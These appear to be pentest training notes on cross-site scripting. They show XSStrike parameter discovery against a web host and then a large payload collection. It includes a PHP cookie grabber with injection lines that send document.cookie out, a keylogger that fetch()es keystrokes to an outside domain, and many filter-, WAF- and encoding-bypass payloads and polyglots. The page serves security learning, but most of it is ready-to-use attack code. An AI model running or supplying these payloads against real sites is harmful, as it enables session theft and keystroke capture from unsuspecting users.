    # Metasploit 魔鬼训练营 (Devil Training Camp) notes: XSS


    Pentesting the OWASP BWA (Broken Web Applications) VM; what follows are notes on XSS.

    Install the XSStrike fuzzer on Ubuntu (it only runs under Python 3). XSStrike fuzzing features:

            • Powerful fuzzing engine
            • Context breaking technology
            • Intelligent payload generation
            • GET & POST method support
            • Cookie Support
            • WAF Fingerprinting
            • Handcrafted payloads for filter and WAF evasion
            • Hidden parameter discovery
            • Accurate results via levenshtein distance algorithm
     
    Example: parameter discovery on a target with --params

    ```
    python3 xsstrike.py -u "http://mail.xxx.com/" --params

    [+] Potentially vulnerable objects found
    [+] Heuristics found a potentially valid parameter: ch. Priortizing it.
    [+] Heuristics found a potentially valid parameter: pubid. Priortizing it.
    [+] Heuristics found a potentially valid parameter: passtype. Priortizing it.
    [+] Heuristics found a potentially valid parameter: support_verify_code. Priortizing it.
    [+] Heuristics found a potentially valid parameter: domain. Priortizing it.
    ```

    Next, fuzz those parameters with the payloads collected below.

    payloads:

    # Cross Site Scripting


    Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.


    - [Exploit code or POC](#exploit-code-or-poc)

    - [Identify an XSS endpoint](#identify-an-xss-endpoint)

    - [XSS in HTML/Applications](#xss-in-htmlapplications)

    - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)

    - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)

    - [Polyglot XSS](#polyglot-xss)

    - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)

    - [CSP Bypass](#csp-bypass)

    - [Common WAF Bypass](#common-waf-bypass)


    ## Exploit code or POC


    Cookie grabber for XSS


    ```php
    <?php
    // grabber.php: appends every value it receives in ?c= to cookies.txt.
    // Inject one of these into the vulnerable page to send document.cookie here:
    //   <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
    //   or
    //   <script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
    // The Image variant is silent (no navigation). Either way, cookies flagged
    // HttpOnly are never visible to document.cookie.

    $cookie = isset($_GET['c']) ? $_GET['c'] : '';
    $fp = fopen('cookies.txt', 'a+');
    fwrite($fp, 'Cookie: ' . $cookie . "\n");
    fclose($fp);
    ?>
    ```


    Keylogger for XSS


    ```javascript

    <img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>

    ```


    More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all):


    - [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)

    - [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)

    - [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)

    - [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)

    - [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)

    - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)


    ## Identify an XSS endpoint


    ```javascript

    <script>debugger;</script>

    ```


    ## XSS in HTML/Applications


    XSS Basic


    ```javascript

    Basic payload

    <script>alert('XSS')</script>

    <scr<script>ipt>alert('XSS')</scr<script>ipt>

    "><script>alert('XSS')</script>

    "><script>alert(String.fromCharCode(88,83,83))</script>


    Img payload

    <img src=x onerror=alert('XSS');>

    <img src=x onerror=alert('XSS')//

    <img src=x onerror=alert(String.fromCharCode(88,83,83));>

    <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

    <img src=x:alert(alt) onerror=eval(src) alt=xss>

    "><img src=x onerror=alert('XSS');>

    "><img src=x onerror=alert(String.fromCharCode(88,83,83));>


    Svg payload

    <svg onload=alert(1)>

    <svg/onload=alert('XSS')>

    <svg onload=alert(1)//

    <svg/onload=alert(String.fromCharCode(88,83,83))>

    <svg id=alert(1) onload=eval(id)>

    "><svg/onload=alert(String.fromCharCode(88,83,83))>

    "><svg/onload=alert(/XSS/)

    ```


    XSS for HTML5


    ```javascript

    <body onload=alert(/XSS/.source)>

    <input autofocus onfocus=alert(1)>

    <select autofocus onfocus=alert(1)>

    <textarea autofocus onfocus=alert(1)>

    <keygen autofocus onfocus=alert(1)>

    <video/poster/onerror=alert(1)>

    <video><source onerror="javascript:alert(1)">

    <video src=_ onloadstart="alert(1)">

    <details/open/ontoggle="alert`1`">

    <audio src onloadstart=alert(1)>

    <marquee onstart=alert(1)>

    <meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>


    <body ontouchstart=alert(1)> // Triggers when a finger touch the screen

    <body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen

    <body ontouchmove=alert(1)> // When a finger is dragged across the screen.

    ```


    XSS using script tag (external payload)


    ```javascript

    <script src=14.rs>

    you can also specify an arbitrary payload with 14.rs/#payload

    e.g: 14.rs/#alert(document.domain)

    ```


    XSS in META tag


    ```javascript

    Base64 encoded

    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">


    <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>


    With an additional URL

    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

    ```


    XSS in Hidden input


    ```javascript

    <input type="hidden" accesskey="X" onclick="alert(1)">

    Use CTRL+SHIFT+X to trigger the onclick event

    ```


    DOM XSS


    ```javascript

    #"><img src=/ onerror=alert(2)>

    ```


    XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic))


    ```javascript

    -(confirm)(document.domain)//

    ; alert(1);//

    ```


    XSS URL


    ```javascript

    URL/<svg onload=alert(1)>

    URL/<script>alert('XSS');//

    URL/<input autofocus onfocus=alert(1)>

    ```


    ## XSS in wrappers javascript and data URI


    XSS with javascript:


    ```javascript
    javascript:prompt(1)

    %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
    (URL-encoded HTML entities for javascript:confirm(1): the server URL-decodes, the HTML parser decodes the entities)

    javascript:confirm(1)

    We can encode the "javascript:" in Hex/Octal
    \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
    \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
    \152\141\166\141\163\143\162\151\160\164\072alert(1)

    We can use a 'newline character' (the URL parser strips tab, CR and LF before matching the scheme)
    java%0ascript:alert(1) - LF (\n)
    java%09script:alert(1) - Horizontal tab (\t)
    java%0dscript:alert(1) - CR (\r)

    Using the escape character (works where a stripslashes-style step removes the backslashes;
    inside a real JS string literal \r and \t would become CR and TAB instead)
    \j\av\a\s\c\r\i\p\t\:\a\l\e\r\t\(1\)

    Using the newline and a comment //
    javascript://%0Aalert(1)
    javascript://anything%0D%0A%0D%0Awindow.alert(1)
    ```


    XSS with data:


    ```javascript

    data:text/html,<script>alert(0)</script>

    data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+

    <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

    ```


    XSS with vbscript: (Internet Explorer only)


    ```javascript

    vbscript:msgbox("XSS")

    ```


    ## XSS in files


    **NOTE:** The XML CDATA section is used here so that the JavaScript payload is not treated as XML markup.


    ```xml

    <name>

    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>

    </name>

    ```


    XSS in XML


    ```xml

    <html>

    <head></head>

    <body>

    <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>

    </body>

    </html>

    ```


    XSS in SVG


    ```xml

    <?xml version="1.0" standalone="no"?>

    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">


    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">

    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

    <script type="text/javascript">

    alert(document.domain);

    </script>

    </svg>

    ```


    XSS in SVG (short)


    ```javascript

    <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>


    <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>

    <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>

    <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

    ```


    XSS in Markdown


    ```markdown

    [a](javascript:prompt(document.cookie))

    [a](j a v a s c r i p t:prompt(document.cookie))

    [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

    [a](javascript:window.onerror=alert;throw%201)

    ```


    XSS in SWF flash application (Flash Player reached end of life in December 2020, so these only matter on legacy targets)


    ```
    Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
    IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
    IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
    ```


    more payloads in ./files


    XSS in SWF flash application (known vulnerable SWF files and their injectable parameters)


    ```

    flashmediaelement.swf?jsinitfunctio%gn=alert`1`

    flashmediaelement.swf?jsinitfunctio%25gn=alert(1)

    ZeroClipboard.swf?id="))} catch(e) {alert(1);}//&width=1000&height=1000

    swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//

    swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf

    plupload.flash.swf?%#target%g=alert&uid%g=XSS&

    moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true

    video-js.swf?readyFunction=alert(1)

    player.swf?playerready=alert(document.cookie)

    player.swf?tracecall=alert(document.cookie)

    banner.swf?clickTAG=javascript:alert(1);//

    io.swf?yid="));}catch(e){alert(1);}//

    video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29

    bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4

    flashcanvas.swf?id=test"));}catch(e){alert(document.domain)}//

    phpmyadmin/js/canvg/flashcanvas.swf?id=test”));}catch(e){alert(document.domain)}//

    ```


    XSS in CSS


    ```html

    <!DOCTYPE html>

    <html>

    <head>

    <style>

    div {

    background-image: url("data:image/jpg;base64,</style><svg/onload=alert(document.domain)>");

    background-color: #cccccc;

    }

    </style>

    </head>

    <body>

    <div>lol</div>

    </body>

    </html>

    ```


    ## Polyglot XSS


    Polyglot XSS - 0xsobky


    ```javascript
    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
    ```


    Polyglot XSS - Ashar Javed


    ```javascript

    ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext></|><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

    ```


    Polyglot XSS - Mathias Karlsson


    ```javascript

    " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

    ```


    Polyglot XSS - Rsnake


    ```javascript

    ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

    ```


    Polyglot XSS - Daniel Miessler


    ```javascript

    javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

    javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

    javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

    javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

    javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

    javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

    javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

    --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

    /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

    javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

    /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

    ```


    Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)

    ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)


    ```javascript
    -->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
    ```


    ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)


    ```javascript
    <svg%0Ao%00nload=%09((pro\u006dpt))()//
    ```


    Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml)


    ```javascript

    # by crlf

    javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload=alert()//>


    # by europa

    javascript:"/*'/*`/*" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>


    # by EdOverflow

    javascript:"/*"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>


    # by h1/ragnar

    javascript:`//"//"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`

    ```


    ## Filter Bypass and exotic payloads


    Bypass case sensitive


    ```javascript

    <sCrIpt>alert(1)</ScRipt>

    ```


    Bypass tag blacklist


    ```javascript

    <script x>

    <script x>alert('XSS')<script y>

    ```


    Bypass word blacklist with code evaluation


    ```javascript
    eval('ale'+'rt(0)');
    Function("ale"+"rt(1)")();
    new Function`alert\`6\``;
    setTimeout('ale'+'rt(2)');
    setInterval('ale'+'rt(10)');
    Set.constructor('ale'+'rt(13)')();
    Set.constructor`al\x65rt\x2814\x29```;
    ```


    Bypass with incomplete html tag - IE/Firefox/Chrome/Safari


    ```javascript

    <img src='1' onerror='alert(0)' <

    ```


    Bypass quotes for string


    ```javascript

    String.fromCharCode(88,83,83)

    ```


    Bypass quotes in script tag (the HTML tokenizer ends the script element at the first `</script>`, whatever JS string you are inside)


    ```javascript
    http://localhost/bla.php?test=</script><script>alert(1)</script>
    <html>
    <script>
    <?php echo 'foo="text '.$_GET['test'].'";';?>
    </script>
    </html>
    ```


    Bypass quotes in mousedown event


    ```javascript

    <a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>


    You can bypass a single quote with ' in an on mousedown event handler

    ```


    Bypass dot filter


    ```javascript
    <script>window['alert'](document['domain'])</script>
    ```


    Bypass parenthesis for string - Firefox/Opera


    ```javascript
    alert`1`
    setTimeout`alert\u0028document.domain\u0029`;
    ```


    Bypass onxxxx= blacklist


    ```javascript

    <object onafterscriptexecute=confirm(0)>

    <object onbeforescriptexecute=confirm(0)>

    ```


    Bypass onxxx= filter with a null byte/vertical tab - IE/Safari


    ```javascript
    <img src='1' onerror\x00=alert(0) />
    <img src='1' onerror\x0b=alert(0) />
    ```


    Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari


    ```javascript

    <img src='1' onerror/=alert(0) />

    ```


    Bypass space filter with "/" - IE/Firefox/Chrome/Safari


    ```javascript

    <img/src='1'/onerror=alert(0)>

    ```


    Bypass space filter with 0x0c/^L


    ```javascript
    <svg^Lonload^L=^Lalert(1)^L>      (^L is the form-feed byte 0x0c; it renders as a space)

    $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
    00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c  <svg.onload.=.al
    00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
    ```


    Bypass document blacklist


    ```javascript

    <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>

    ```


    Bypass using javascript inside a string


    ```javascript

    <script>

    foo="text </script><script>alert(1)</script>";

    </script>

    ```


    Bypass using an alternate way to redirect


    ```javascript

    location="http://google.com"

    document.location = "http://google.com"

    document.location.href="http://google.com"

    window.location.assign("http://google.com")

    window['location']['href']="http://google.com"

    ```


    Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)


    ```javascript

    window['alert'](0)

    parent['alert'](1)

    self['alert'](2)

    top['alert'](3)

    this['alert'](4)

    frames['alert'](5)

    content['alert'](6)


    [7].map(alert)

    [8].find(alert)

    [9].every(alert)

    [10].filter(alert)

    [11].findIndex(alert)

    [12].forEach(alert);

    ```


    Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464)


    ```javascript
    eval('ale'+'rt(0)');
    Function("ale"+"rt(1)")();
    new Function`alert\`6\``;

    constructor.constructor("aler"+"t(3)")();
    [].filter.constructor('ale'+'rt(4)')();

    top["al"+"ert"](5);
    top[8680439..toString(30)](7);
    top[/al/.source+/ert/.source](8);
    top['al\x65rt'](9);

    open('java'+'script:ale'+'rt(11)');
    location='javascript:ale'+'rt(12)';

    setTimeout`alert\u0028document.domain\u0029`;
    setTimeout('ale'+'rt(2)');
    setInterval('ale'+'rt(10)');
    Set.constructor('ale'+'rt(13)')();
    Set.constructor`al\x65rt\x2814\x29```;
    ```


    Bypass using an alternate way to trigger an alert


    ```javascript
    // The lockdown below replaces window.alert with a stub, but a freshly created
    // iframe gets its own window with an untouched alert: call that one instead.
    var i = document.createElement("iframe");
    i.onload = function(){
        i.contentWindow.alert(1);
    }
    document.body.appendChild(i);   // document.appendChild(i) throws HierarchyRequestError

    // Bypassed security: the page's lockdown helper (XSSObject is assumed to be
    // defined by that page) proxies window.alert to a no-op
    XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
        var proxy = obj[name];
        obj[name] = function () {
            if (exec_original) {
                return proxy.apply(this, arguments);
            }
        };
        XSSObject.lockdown(obj, name);
    };
    XSSObject.proxy(window, 'alert', 'window.alert', false);
    ```


    Bypass ">" using nothing #trololo (you don't need to close your tags)


    ```javascript

    <svg onload=alert(1)//

    ```


    Bypass ';' using another character


    ```javascript

    'te' * alert('*') * 'xt';

    'te' / alert('/') / 'xt';

    'te' % alert('%') % 'xt';

    'te' - alert('-') - 'xt';

    'te' + alert('+') + 'xt';

    'te' ^ alert('^') ^ 'xt';

    'te' > alert('>') > 'xt';

    'te' < alert('<') < 'xt';

    'te' == alert('==') == 'xt';

    'te' & alert('&') & 'xt';

    'te' , alert(',') , 'xt';

    'te' | alert('|') | 'xt';

    'te' ? alert('ifelsesh') : 'xt';

    'te' in alert('in') in 'xt';

    'te' instanceof alert('instanceof') instanceof 'xt';

    ```


    Bypass using HTML encoding


    ```javascript

    %26%2397;lert(1)

    ```


    Bypass using [Katakana](https://github.com/aemkei/katakana.js)


    ```javascript

    javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()

    ```


    Bypass using Octal encoding


    ```javascript
    javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
    (the string decodes to <svg onload=alert(1)>; a javascript: URL that evaluates to a string renders that string as the new document)
    ```


    Bypass using Unicode

    These bypasses rely on the application converting characters after its filter has run (compatibility normalization such as NFKC, or a lossy "best fit" charset conversion), so the filter never sees the ASCII character that ends up in the page.


    ```javascript
    Unicode character U+FF1C FULLWIDTH LESS-THAN SIGN (encoded as %EF%BC%9C) was
    transformed into U+003C LESS-THAN SIGN (<)

    Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
    transformed into U+0022 QUOTATION MARK (")

    Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
    transformed into U+0027 APOSTROPHE (')

    E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
    %EF%BC%9E becomes >
    %EF%BC%9C becomes <
    ```


    Bypass using Unicode converted to uppercase


    ```javascript
    İ (%c4%b0).toLowerCase() => i   (in JavaScript the result is "i" followed by U+0307 COMBINING DOT ABOVE; the trick needs a conversion that drops the mark)
    ı (%c4%b1).toUpperCase() => I
    ſ (%c5%bf).toUpperCase() => S
    K (%E2%84%AA).toLowerCase() => k

    <ſvg onload=... > becomes <SVG ONLOAD=...>
    <ıframe id=x onload=>.toUpperCase() becomes <IFRAME ID=X ONLOAD=>
    ```
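The "Bypass using Unicode" and "Bypass using Unicode converted to uppercase" entries above share one root cause: a filter that inspects the raw input while the application normalizes or case-maps the string afterwards. The following is an added example, not code from the original page; the blacklist and the `normalize('NFKC').toUpperCase()` post-processing are hypothetical stand-ins for such an application, and the probe strings are constructed here.

```javascript
// Added example: "filter first, transform second" reproduced in Node.
// BLOCKED_TAGS, postProcess() and PROBES are assumptions for illustration.

const BLOCKED_TAGS = ['svg', 'script', 'img', 'iframe'];

// Case-insensitive blacklist: rejects anything containing "<tag".
// It only knows ASCII, so U+FF1C (fullwidth <), U+017F (long s) and
// U+0131 (dotless i) pass through untouched.
function blacklistAllows(input) {
  const lower = input.toLowerCase();
  return !BLOCKED_TAGS.some((tag) => lower.includes('<' + tag));
}

// Post-processing the application applies later. NFKC maps fullwidth
// punctuation to ASCII (U+FF1C -> "<", U+FF1E -> ">") and U+017F to "s";
// toUpperCase() maps U+0131 to "I" and U+017F to "S".
// The U+02BA/U+02B9 -> quote mappings listed on this page are not NFKC;
// they come from lossy "best fit" charset conversions on some platforms.
function postProcess(input) {
  return input.normalize('NFKC').toUpperCase();
}

// Vulnerable order: filter the raw input, then transform it.
// Returns the markup that reaches the page, or null when filtered.
function renderVulnerable(input) {
  if (!blacklistAllows(input)) return null;
  return postProcess(input);
}

// Fixed order: transform first, then run the filter on the final form,
// i.e. on the exact string the HTML parser will see.
function renderFixed(input) {
  const finalForm = postProcess(input);
  if (!blacklistAllows(finalForm)) return null;
  return finalForm;
}

// Constructed probes using the page's tricks.
const PROBES = {
  plain:     '<svg onload=alert(1)>',
  longS:     '<\u017Fvg onload=alert(1)>',        // <ſvg
  dotlessI:  '<\u0131frame onload=alert(1)>',     // <ıframe
  fullwidth: '\uFF1Csvg onload=alert(1)\uFF1E',   // ＜svg ... ＞
};

// Run every probe through both pipelines and report what reaches the page.
function probe() {
  const results = {};
  for (const [name, value] of Object.entries(PROBES)) {
    results[name] = {
      vulnerable: renderVulnerable(value),
      fixed: renderFixed(value),
    };
  }
  return results;
}

console.log(probe());
```

Every non-ASCII probe comes out of `renderVulnerable` as a plain `<SVG ...>` or `<IFRAME ...>` tag, while `renderFixed` rejects all of them; the only change is the order of the two steps.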


    Bypass using overlong UTF-8 (legacy decoders only: RFC 3629-conformant decoders reject overlong sequences)


    ```javascript

    < = %C0%BC = %E0%80%BC = %F0%80%80%BC

    > = %C0%BE = %E0%80%BE = %F0%80%80%BE

    ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7

    " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2

    " = %CA%BA

    ' = %CA%B9

    ```


    Bypass using UTF-7 (legacy: only old Internet Explorer auto-detected UTF-7; current browsers do not decode it)


    ```javascript

    +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

    ```


    Bypass using UTF-16be


    ```javascript
    %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
    \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
    ```


    Bypass using UTF-32 (legacy: the WHATWG Encoding Standard has no UTF-32 decoder, so current browsers do not honour it)


    ```js

    %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

    ```


    Bypass using BOM - Byte Order Mark (the response body must begin with the BOM bytes)

    The BOM overrides the page charset: the HTML encoding sniffing algorithm checks for a BOM before the HTTP Content-Type charset and any `<meta charset>`, so a UTF-16 BOM at the very start of the body switches the decoder for the whole document. The UTF-32 variant only applied to legacy browsers.


    ```js

    BOM Character for UTF-16 Encoding:

    Big Endian : 0xFE 0xFF

    Little Endian : 0xFF 0xFE

    XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E


    BOM Character for UTF-32 Encoding:

    Big Endian : 0x00 0x00 0xFE 0xFF

    Little Endian : 0xFF 0xFE 0x00 0x00

    XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

    ```
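As an added example (not code from the original page), the following builds the UTF-16 and UTF-32 forms of a payload with their BOMs, percent-encodes them the way they go into a request, and shows what a byte-level ASCII filter and a BOM-driven UTF-16 decoder each make of the bytes. The payload, the filter and the decoder are assumptions for illustration.

```javascript
// Added example: UTF-16/UTF-32 payload encoding with BOM, checked against an
// ASCII byte filter and a UTF-16 decoder. PAYLOAD, asciiFilterBlocks() and
// decodeUtf16() are assumptions, not part of the page.

const PAYLOAD = '<svg/onload=alert()>';

const BOMS = {
  'utf-16be': [0xfe, 0xff],
  'utf-16le': [0xff, 0xfe],
  'utf-32be': [0x00, 0x00, 0xfe, 0xff],
};

// Encode a BMP string in the chosen encoding, optionally BOM-prefixed.
function encodePayload(str, encoding, withBom) {
  if (!(encoding in BOMS)) throw new Error('unsupported encoding: ' + encoding);
  const bytes = withBom ? [...BOMS[encoding]] : [];
  for (const ch of str) {
    const cp = ch.codePointAt(0);
    if (cp > 0xffff) throw new Error('astral code points are not handled here');
    const hi = cp >> 8, lo = cp & 0xff;
    if (encoding === 'utf-16be') bytes.push(hi, lo);
    else if (encoding === 'utf-16le') bytes.push(lo, hi);
    else bytes.push(0, 0, hi, lo);
  }
  return Uint8Array.from(bytes);
}

// Percent-encode every byte except ASCII letters and digits. (The hand-written
// strings above leave "/", "=", "(" and ")" literal; the bytes are the same.)
function percentEncode(bytes) {
  let out = '';
  for (const b of bytes) {
    const alnum = (b >= 0x30 && b <= 0x39) || (b >= 0x41 && b <= 0x5a) || (b >= 0x61 && b <= 0x7a);
    out += alnum ? String.fromCharCode(b) : '%' + b.toString(16).toUpperCase().padStart(2, '0');
  }
  return out;
}

// A byte-level blacklist of the kind a WAF applies to the raw body: it looks
// for the ASCII bytes of "<svg" or "<script", so the NUL-interleaved UTF-16
// form never matches.
function asciiFilterBlocks(bytes) {
  const body = Array.from(bytes, (b) => String.fromCharCode(b)).join('').toLowerCase();
  return body.includes('<svg') || body.includes('<script');
}

// What the browser does once the BOM has selected UTF-16: drop the BOM, then
// read 2-byte units in the BOM's byte order (big-endian when there is none).
// No UTF-32 decoder is written because current browsers do not have one.
function decodeUtf16(bytes) {
  let offset = 0;
  let bigEndian = true;
  if (bytes[0] === 0xfe && bytes[1] === 0xff) offset = 2;
  else if (bytes[0] === 0xff && bytes[1] === 0xfe) { offset = 2; bigEndian = false; }
  let out = '';
  for (let i = offset; i + 1 < bytes.length; i += 2) {
    const unit = bigEndian ? (bytes[i] << 8) | bytes[i + 1] : (bytes[i + 1] << 8) | bytes[i];
    out += String.fromCharCode(unit);
  }
  return out;
}

// Round trip every encoding and report what each side sees.
function demo() {
  const results = {};
  for (const enc of Object.keys(BOMS)) {
    const bytes = encodePayload(PAYLOAD, enc, true);
    results[enc] = {
      request: percentEncode(bytes),
      blockedByAsciiFilter: asciiFilterBlocks(bytes),
      browserSees: enc.startsWith('utf-16') ? decodeUtf16(bytes) : '(no UTF-32 decoder in current browsers)',
    };
  }
  return results;
}

console.log(demo());
```

The `request` strings reproduce the `%fe%ff%00%3C%00s...` and `%00%00%fe%ff%00%00%00%3C...` forms listed above, the ASCII filter reports no hit on any of them, and the UTF-16 decoder returns the original `<svg/onload=alert()>` for both byte orders.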



    Bypass using weird encoding or native interpretation to hide the payload (alert())


    ```javascript
    <script>\u0061\u006C\u0065\u0072\u0074(1)</script>
    <img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
    <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
